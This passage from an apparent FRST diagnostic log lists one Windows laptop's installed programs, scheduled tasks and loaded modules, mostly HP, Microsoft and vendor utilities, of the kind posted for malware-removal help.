ESET Online Scanner v3 (HKLM-x32\...\ESET Online Scanner) (Version:  - )
Facebook Plug-In (HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Facebook Plug-In) (Version:  - Facebook, Inc.)
FileHippo.com Update Checker (HKLM-x32\...\FileHippo.com) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HiJackThis (HKLM-x32\...\{45A66726-69BC-466B-A7A4-12FCBA4883D7}) (Version: 1.0.0 - Trend Micro)
Homepage Protection (HKLM-x32\...\Homepage Protection) (Version:  - AOL Products)
HouseCall for Home Networks (HKLM\...\DRScanner) (Version: 2.1.1183 - Trend Micro Inc.)
HP 3D DriveGuard (HKLM\...\{85A42FF0-F0D0-44A3-B226-C124D6E8B1D5}) (Version: 4.0.3.1 - Hewlett-Packard)
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.3.12286.3436 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.0.71 - WildTangent)
HP Integrated Module with Bluetooth wireless technology (HKLM\...\{9E9D49A4-1DF4-4138-B7DB-5D87A893088E}) (Version: 6.2.0.9602 - Broadcom Corporation)
HP MediaSmart DVD (HKLM-x32\...\InstallShield_{DCCAD079-F92C-44DA-B258-624FC6517A5A}) (Version: 3.0.3123 - Hewlett-Packard)
HP MediaSmart Internet TV (HKLM-x32\...\InstallShield_{E553760D-D7F7-48BF-BD8B-C7E23BA04CB5}) (Version: 3.0.1916 - Hewlett-Packard)
HP MediaSmart Live TV (HKLM-x32\...\InstallShield_{67626E09-5366-4480-8F1E-93FADF50CA15}) (Version: 3.0.1924 - Hewlett-Packard)
HP MediaSmart Movie Themes (HKLM-x32\...\InstallShield_{3023EBDA-BF1B-4831-B347-E5018555F26E}) (Version: 3.0.3102 - Hewlett-Packard)
HP MediaSmart Music/Photo/Video (HKLM-x32\...\InstallShield_{B2EE25B9-5B00-4ACF-94F0-92433C28C39E}) (Version: 3.0.3123 - Hewlett-Packard)
HP MediaSmart SlingPlayer (HKLM-x32\...\{90F6051D-A69F-4159-9203-7E20430E1056}) (Version: 2.1.1.60 - Sling Media, Inc.)
HP MediaSmart SmartMenu (HKLM\...\{88E60521-1E4E-4785-B9F1-1798A4BD0C30}) (Version: 3.0.30.1 - Hewlett-Packard)
HP MediaSmart Software Notebook Demo (HKLM-x32\...\{82A213BD-B6AA-4281-A2D3-59D51893CC56}) (Version: 1.00.0000 - Hewlett-Packard)
HP MediaSmart Webcam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.0.1913 - Hewlett-Packard)
HP Quick Launch Buttons (HKLM-x32\...\{34D2AB40-150D-475D-AE32-BD23FB5EE355}) (Version: 6.50.12.1 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{F3B912F5-EB57-45AA-B3D1-EB532BCF6EF8}) (Version: 1.2.3220.3079 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.3.50.9 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.5.32.203 - Hewlett-Packard Company)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HP User Guides 0154 (HKLM-x32\...\{B51605BF-6326-4553-AE96-6D7F1813D5F5}) (Version: 1.01.0001 - Hewlett-Packard)
HP Wireless Assistant (HKLM-x32\...\{54CC7901-804D-4155-B353-21F0CC9112AB}) (Version: 3.50.9.1 - Hewlett-Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6230.0 - IDT)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1883 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Kaspersky Security Scan (HKLM-x32\...\InstallWIX_{D1282694-0693-41A8-ABC1-6D1FFC1F65C5}) (Version: 15.0.0.740 - Kaspersky Lab)
Kaspersky Security Scan (x32 Version: 15.0.0.740 - Kaspersky Lab) Hidden
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1913 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.1913 - CyberLink Corp.) Hidden
Libronix Digital Library System (HKLM-x32\...\Libronix DLS) (Version:  - Libronix Corporation)
Libronix Digital Library System (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Libronix DLS Application (x32 Version: 1.00.0002 - Libronix Corporation) Hidden
LibronixUpdate (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
LightScribe System Software (HKLM-x32\...\{7EACD74C-147F-478C-9389-F9F52EE3C88A}) (Version: 1.18.10.2 - LightScribe)
LLS Resource Driver (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Logos Bible Software (HKLM-x32\...\{4331D6C3-912C-4015-9E2E-8149CF4AD56D}) (Version: 6.48.56 - Faithlife Corporation)
LSI HDA Modem (HKLM\...\LSI Soft Modem) (Version: 2.1.94 - LSI Corporation)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Medical Office Simulation Software (MOSS) (HKLM-x32\...\ODEUNST #1) (Version:  - )
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Access 2000 Runtime (HKLM-x32\...\{00180409-78E1-11D2-B60F-006097C998E7}) (Version: 9.00.2729 - Microsoft Corporation)
Microsoft Live Search Toolbar (HKLM-x32\...\{DF802C05-4660-418c-970C-B988ADB1D316}) (Version: 3.0.560.0 - Microsoft Live Search Toolbar)
Microsoft Office 365 ProPlus - en-us (HKLM\...\O365ProPlusRetail - en-us) (Version: 16.0.7870.2031 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\OneDriveSetup.exe) (Version: 17.3.6281.1202 - Microsoft Corporation)
Microsoft OneNote Home and Student 2016 - en-us (HKLM\...\OneNoteFreeRetail - en-us) (Version: 16.0.7870.2031 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50905.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
MovieEdit Task (x32 Version: 1.3.1.21 - Canon) Hidden
Mozilla Firefox 52.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 52.0.2 (x86 en-US)) (Version: 52.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.0.2.6291 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
OEB Resource Driver (x32 Version: 1.00.0002 - Libronix Corporation) Hidden
Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7830.1018 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.7870.2024 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7668.2066 - Microsoft Corporation) Hidden
Online Plug-in (x32 Version: 14.3.0.5014 - Citrix Systems, Inc.) Hidden
Panda ActiveScan 2.0 (HKLM-x32\...\ActiveScan 2.0) (Version: 01.04.01.0014 - Panda Security)
PDF Resource Driver (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Photo Story 3 for Windows (HKLM-x32\...\{4F41AD68-89F2-4262-A32C-2F70B01FCE9E}) (Version: 3.0.1115.11 - Microsoft Corporation)
PhotoStitch (x32 Version: 3.1.14 - Canon) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.3101 - CyberLink Corp.)
Power2Go (x32 Version: 6.0.3101 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 7.0.3101 - CyberLink Corp.)
PowerDirector (x32 Version: 7.0.3101 - CyberLink Corp.) Hidden
PowerRecover (x32 Version: 5.5.1923 - CyberLink Corp.) Hidden
QLBCASL (x32 Version: 6.40.17.2 - Hewlett-Packard) Hidden
RAW Image Task 2.1 (x32 Version: 2.1 - Canon) Hidden
Realtek 8136 8168 8169 Ethernet Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0007 - Realtek)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7100.30094 - Realtek Semiconductor Corp.)
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
Savings Bond Wizard (HKLM-x32\...\{566DBD89-9955-4024-9384-A6301C8C6584}) (Version: 4.15 - )
Self-service Plug-in (x32 Version: 4.3.0.8352 - Citrix Systems, Inc.) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
SlingBoxWatchYourTVAnyWhere (HKLM-x32\...\{4313E16C-811B-469F-8815-6EB98085F8B2}) (Version: 2.1.1.58 - Sling Media)
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.16104.4 - Samsung Electronics Co., Ltd.)
Smart Switch (x32 Version: 4.1.16104.4 - Samsung Electronics Co., Ltd.) Hidden
Snapshot Viewer 9.0 (HKLM-x32\...\Snapshot Viewer 9.0) (Version:  - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.29.0 - Synaptics Incorporated)
Understanding Health Insurance: A Guide to Billing and Reimburs (HKLM-x32\...\Understanding Health Insurance: A Guide to Billi~35254FEE_is1) (Version:  - Cengage Learning)
Visual C++ 8.0 Runtime Setup Package (x64) (HKLM-x32\...\{2FDBBCEA-62DB-45F4-B6E5-0E1FB2A1F29D}) (Version: 9.0.0.623 - AVG Technologies CZ, s.r.o.)
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Live OneCare safety scanner (HKLM-x32\...\Windows Live OneCare safety scanner) (Version:  - Microsoft Corporation)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - CACE Technologies)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3698744866-2675293530-421701469-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\KEKLR\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\amd64\FileCoAuthLib64.dll ()

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {04D9E3C8-0160-4165-B472-9D7D5DDC7153} - System32\Tasks\CLMLSvc => c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe [2009-07-23] (CyberLink)
Task: {05D97400-F4B4-461C-AE93-2E3D205377C1} - System32\Tasks\Microsoft\Microsoft Antimalware\MpIdleTask => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {132EC511-3C23-42C3-8C9E-CDCC63AB80F3} - System32\Tasks\HPCeeScheduleForKEKLR => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {145E92C4-1FF3-4DB0-AFBD-FA4A35F22A85} - System32\Tasks\{DDBABCCF-0E03-48B8-AAC5-512D701FC2BA} => pcalua.exe -a "C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe" -d C:\Windows\SysWOW64 -c /AppMode=DOWNLOADMANAGER /SummerUpdate /PackageType=Free /ProductType=Free
Task: {1653F1CF-6E42-4A57-B1F3-2331E782F7DF} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
Task: {25329AA8-56DA-47A3-A214-CD57C79EE3BB} - System32\Tasks\EPSON WF-3620 Series Invitation {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE [2013-02-28] (SEIKO EPSON CORPORATION)
Task: {2F9F7F2B-9DE0-4FD3-9DD3-D5256B0C4963} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
Task: {3477DA62-7A69-452C-85C6-51B4223BF80D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {35A45B35-0D28-49CD-B470-428AAE2985FA} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2017-03-26] (Microsoft Corporation)
Task: {36B8DCAF-7E99-45E8-8CB2-EBF259655B32} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {461E1321-EAD9-47CE-9655-A44155D9562E} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-26] (Microsoft Corporation)
Task: {463B4B29-6E00-4416-A6C2-F5518E018A06} - System32\Tasks\CapSvcInst => c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CapSvcInst.exe [2009-07-24] (CL)
Task: {4CA243C2-0C39-4E77-A907-68E5E9F001E7} - System32\Tasks\HP AR Program Upload - d4c224df55a54f048e6f468e17db3cda9ee5115ba9824a6aaa2ad50f2d58ff76 => C:\Program Files\HP\HP Officejet 4620 series\bin\HPRewards.exe
Task: {510B196C-5350-4298-B4D2-AF749C488825} - System32\Tasks\{6820B139-0AD1-4144-A3FD-E70E8C28103B} => pcalua.exe -a "C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe" -d C:\Users\KEKLR\Desktop
Task: {6ABDB4A5-5EEE-4582-AC77-71DE2C4C0276} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {78667CB8-13B8-4CD5-B743-C86376C5B946} - System32\Tasks\TVAgent => c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\TVAgent.exe [2009-07-24] (CyberLink Corp.)
Task: {7B40D90F-4DA6-41EA-BF23-8C81ED9BF51F} - System32\Tasks\{C8C31B20-64FD-4571-A75B-8134EA7E188D} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.117/en/abandoninstall?source=lightinstaller&amp;page=tsInstall&amp;installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:notoffered;alreadyoffered
Task: {7CEFAF45-0BAB-4607-AC88-18BAE86BCB6A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {7D6798B1-B1DF-4CBC-9367-7625DBE4C791} - System32\Tasks\{286CA1FA-44BE-4DAE-BD48-109C0D949B7C} => pcalua.exe -a "C:\Program Files (x86)\Administrative Medical Assisting\Fordney.exe" -d "C:\Program Files (x86)\Administrative Medical Assisting"
Task: {8153CE22-9583-4852-B540-A11AC6873ECC} - System32\Tasks\HP AR Program Upload - 32facac8e4824c6b8de49339b4a017b6fdc9427e5dc9450d9173ed4d1f36a800 => C:\Program Files\HP\HP Officejet 4620 series\bin\HPRewards.exe
Task: {8529AC47-189E-4DDF-B06C-D355E6130614} - System32\Tasks\{C834371F-AFA0-4D39-B5C0-C65F016AC328} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.117/en/abandoninstall?source=lightinstaller&amp;page=tsPlugin&amp;installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:offered-installed;madedefault
Task: {855253AF-2866-4F9C-8CE0-9A0D144A0C17} - System32\Tasks\{50EF73A5-0164-4666-9D2A-362272AD6E5A} => pcalua.exe -a C:\Users\KEKLR\Desktop\HijackThis.exe -d C:\Users\KEKLR\Desktop
Task: {878A2D8B-887B-41B4-AD83-93D5BEE68755} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.)
Task: {8B0F422D-77F6-4C05-A968-99C5CD3225E9} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater - Resources => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {948B8490-55F2-4AB3-A5AE-15F63AA9A2D3} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-03-26] (Microsoft Corporation)
Task: {96BEA435-3A8E-434A-9AE1-17C8BB82E9C2} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-11-07] (HP Inc.)
Task: {9B2A54DA-C3A9-4829-A9E5-B33271C40E76} - System32\Tasks\DVDAgent => c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe [2009-07-23] (CyberLink Corp.)
Task: {AF2F0692-3E07-4F91-87AE-683E3C6DB159} - System32\Tasks\EPSON WF-3620 Series Update {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE [2013-02-28] (SEIKO EPSON CORPORATION)
Task: {B6D0E72C-8127-428D-80D2-BAA383300CC4} - System32\Tasks\CapSchedInst => c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CapSchedInst.exe [2009-07-24] (CL)
Task: {C2B2C745-6D3C-4382-8A7A-A99C23903026} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2017-03-02] (HP Inc.)
Task: {C9A7933D-8FBB-431A-A7A3-494F7DB92609} - System32\Tasks\{E7EAECF8-C12C-48F3-A224-0E1E8217794D} => pcalua.exe -a C:\HJT\HijackThis.exe -d C:\HJT
Task: {D34DA717-71B8-45BD-9EF4-ECE24ECC4A8F} - System32\Tasks\HP AR Program Upload - c12c17c4f19f48a296a0aa8bf65f83c9246d63c68c0b4888986ace00978760d6 => C:\Program Files\HP\HP Officejet 4620 series\bin\HPRewards.exe
Task: {D36A7D16-FBC0-4A7A-9299-D58BBD854070} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {DAC5341D-288C-497E-87A6-E5B0A7BB636D} - System32\Tasks\CapUninst => c:\Program Files (x86)\Hewlett-Packard\Media\Live TV\Kernel\TV\CapUninst.exe [2009-07-24] (CL)
Task: {DEE14384-7905-4670-89F2-0DD5537DDCF2} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-03-10] (HP Inc.)
Task: {E249B004-6E71-428A-B8C6-D6B544BF9CDE} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-03-14] (Adobe Systems Incorporated)
Task: {F48C3389-DD00-468F-A973-CFDC7DBC1811} - System32\Tasks\HP AR Program Upload - 0d60bc3f0082496cb0a78fb164966ae5a438eec360ce49da826ce93d3fddc137 => C:\Program Files\HP\HP Officejet 4620 series\bin\HPRewards.exe
Task: {F527B042-0A90-41E1-BB74-CB6A04386782} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-26] (Microsoft Corporation)
Task: {F7839AA3-029F-4006-8CAA-6F10A08907C6} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-03-26] (Microsoft Corporation)
Task: {FB4AE634-F4B6-4C0A-8A6A-A65CD4BDFB0A} - System32\Tasks\DRScanner Startup => C:\Program Files (x86)\Trend Micro\DRScanner\DRScanner.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\EPSON WF-3620 Series Invitation {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE
Task: C:\Windows\Tasks\EPSON WF-3620 Series Update {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE :/EXE:{3B76C7EA-C0FF-4F54-B66C-1997DF8C469D} /F:Update  SYSTEM ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi
Task: C:\Windows\Tasks\HPCeeScheduleForKEKLR.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2010-05-18 14:12 - 2009-11-05 08:40 - 00085504 _____ () C:\Windows\System32\cpwmon64.dll
2016-08-23 19:23 - 2017-02-26 15:32 - 08930496 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2009-07-21 13:34 - 2009-07-21 13:34 - 00610872 _____ () C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
2009-08-09 04:42 - 2009-01-21 14:47 - 00247152 ____N () C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
